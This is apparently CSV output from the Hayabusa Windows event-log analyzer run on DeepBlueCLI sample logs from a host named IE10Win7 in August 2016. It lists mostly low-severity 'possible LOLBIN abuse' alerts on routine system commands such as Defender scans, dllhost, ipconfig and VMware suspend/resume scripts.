2016-08-20 01:01:36.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 01:01:36.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 01:03:36.695 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 01:57:08.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 02:02:48.677 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 02:02:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:09:55.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:09:57.781 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:10:11.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:10:17.702 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:47:30.057 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:47:31.026 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:47:31.073 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 05:47:46.745 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 06:12:04.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 06:12:28.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 06:12:41.946 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 06:13:05.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 08:02:20.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 08:02:20.640 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 08:02:22.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 08:02:35.890 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 01:03:06.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 01:03:06.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 01:03:07.144 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 01:03:07.801 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 01:03:11.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 01:03:25.629 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 01:06:05.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 03:14:25.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 03:14:25.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 03:14:25.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 03:16:25.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 04:31:04.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:05:57.675 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:05:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:13.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:19.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:38.077 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-21 05:06:38.083 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:11.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:12.103 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:12.141 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:00:33.844 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:03:11.036 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:03:11.056 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:10:05.018 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:10:05.024 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:10.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:10.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:10.669 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:42:29.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:11.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-22 06:45:13.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:45:28.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:45:29.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
